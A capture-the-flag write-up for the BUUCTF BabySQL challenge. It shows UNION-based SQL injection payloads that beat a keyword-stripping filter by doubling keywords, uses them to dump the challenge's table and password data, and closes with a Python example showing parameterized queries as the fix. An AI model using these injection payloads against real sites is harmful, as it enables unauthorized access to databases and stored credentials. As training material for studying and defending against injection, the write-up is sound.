BUUCTF WEB [极客大挑战 2019]BabySQL
-
After entering the environment, logging in with a universal password failed, so try ordinary SQL injection.
-
check.php?username=1&password=2' union select 1,2,3;#
Response:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1,2,3;#'' at line 1
This confirms the injection point.
-
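Looking at the error in the response, union select has been filtered out, probably replaced with an empty string by a replace() function. Nesting each keyword inside a copy of itself leaves the keyword intact after one removal pass:
check.php?username=1&password=2' ununionion seselectlect 1,2,3;#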
Response:
Login Success! Hello 2! Your password is '3'
This gives the echo positions, so the injection can begin.
-
Query the table names
ununionion seselectlect 1,2,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=database());#
Result: 'b4bsql,geekuser'
Query the column names
ununionion seselectlect 1,2,(selselectect group_concat(column_name) frofromm infoorrmation_schema.columns whwhereere table_name='b4bsql');#
Result: 'id,username,password'
Query the passwords
ununionion seselectlect 1,2,(seselectlect group_concat(passwoorrd) frfromom b4bsql);#
Result: 'i_want_to_play_2077,sql_injection_is_so_fun,do_you_know_pornhub,github_is_different_from_pornhub,you_found_flag_so_stop,i_told_you_to_stop,hack_by_cl4y,flag{e5cc7e5a-dc6d-4251-963a-e641acea493e}'
-
This yields the flag:
flag{e5cc7e5a-dc6d-4251-963a-e641acea493e}
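Why the keyword filter guessed at above fails, and what replaces it, as an added example that is not code from the challenge or from this write-up. The blacklist contents (inferred from the keywords the payloads double), the function names and the sample users table are all assumptions.

```python
import re
import sqlite3

# Assumed blacklist, inferred from the keywords doubled in the payloads above.
BLACKLIST = ("union", "select", "from", "where", "or")

def strip_once(value: str) -> str:
    """Model of the suspected filter: one removal pass per keyword."""
    for word in BLACKLIST:
        value = re.sub(word, "", value, flags=re.IGNORECASE)
    return value

def strip_until_stable(value: str) -> str:
    """Repeating the pass stops keyword doubling but also mangles honest input."""
    while (stripped := strip_once(value)) != value:
        value = stripped
    return value

def login(db: sqlite3.Connection, username: str, password: str):
    """Hardened lookup: bound parameters keep input out of the SQL text."""
    return db.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()

def demo_db() -> sqlite3.Connection:
    """Constructed sample table, not the challenge database.
    The plaintext password only keeps the sample short."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'alice', 'hunter2')")
    return db

if __name__ == "__main__":
    payload = "2' ununionion seselectlect 1,2,3;#"      # from the write-up
    print(repr(strip_once("2' union select 1,2,3;#")))  # keywords vanish
    print(repr(strip_once(payload)))                    # keywords reassemble
    print(repr(strip_until_stable(payload)))            # doubling no longer helps
    print(repr(strip_until_stable("orange")))           # honest input damaged
    db = demo_db()
    print(login(db, "1", payload))                      # payload is only data
    print(login(db, "alice", "hunter2"))
```

The first output matches the MariaDB error above, where only 1,2,3;# survives the filter. With bound parameters no keyword filter is needed, so honest input such as "orange" is never altered.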